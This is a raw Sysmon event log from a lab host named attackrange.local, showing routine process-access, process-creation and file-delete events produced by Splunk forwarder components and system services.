09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978329Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978328Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978327Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978326Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978325Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978324Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978323Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978322Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978321Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8A47-6151-B479-00000000FD01}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978320Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.243{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A47-6151-B479-00000000FD01}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978319Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:27.228{69CF5F33-8A47-6151-B479-00000000FD01}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000978362Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A48-6151-B679-00000000FD01}3296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978361Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978360Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978359Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978358Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978357Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978356Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978355Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978354Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978353Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978352Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8A48-6151-B679-00000000FD01}3296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978351Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.618{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A48-6151-B679-00000000FD01}3296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978350Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.603{69CF5F33-8A48-6151-B679-00000000FD01}3296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978349Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.415{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72E51CED2D8BA49C3AC99CD3B0EAAB12,SHA256=22BDF8F2D165E37BE4D3DE349DB144CA12BE443DE5D56F4B6669AAEAB16994EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978348Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.274{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07E116D40CB4D2ADD28033F072019CA6,SHA256=03A8954CCBFBC5943A1F0549D601DB2A7E7824AE797FB0F60BF84F385A894094,IMPHASH=00000000000000000000000000000000falsetrue 